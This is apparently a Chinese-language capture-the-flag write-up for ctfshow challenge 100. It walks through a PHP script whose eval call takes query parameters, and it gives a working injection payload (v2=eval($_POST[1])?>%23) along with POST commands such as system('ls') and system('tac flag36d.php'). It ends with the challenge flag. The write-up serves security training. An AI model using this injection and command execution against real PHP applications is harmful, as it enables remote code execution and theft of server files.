终于做到100题了!!!
咱就是说先看代码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
if(!preg_match("/\;/", $v2)){
if(preg_match("/\;/", $v3)){
eval("$v2('ctfshow')$v3");
}
}
}
?>
首先v0这里赋值是大于逻辑运算的,所以只要v1是数字,v2v3是啥都行
第一个判断里v2不能有分号(;)
第二个判断里v3必须有分号(;)
最后的eval里面有括号直接闭合了,直接执行的话不好构造函数,我们直接在v2里面把后面的php代码直接过滤掉
构造
?v1=1&v2=eval($_POST[1])?>%23&v3=; #这里用%23不直接用#是因为在url里直接用#会把后面的东西直接注释掉,用%23就可以吧注释符写入php里面
1=system('ls');
1=system('tac flag36d.php');
md,居然啥都没没有
但是咱在ctfshow.php里面看到这一段
听百度大佬说0x2d是-
ctfshow{788286a0-1ee9-4756-ac10-8c82ff24fc45}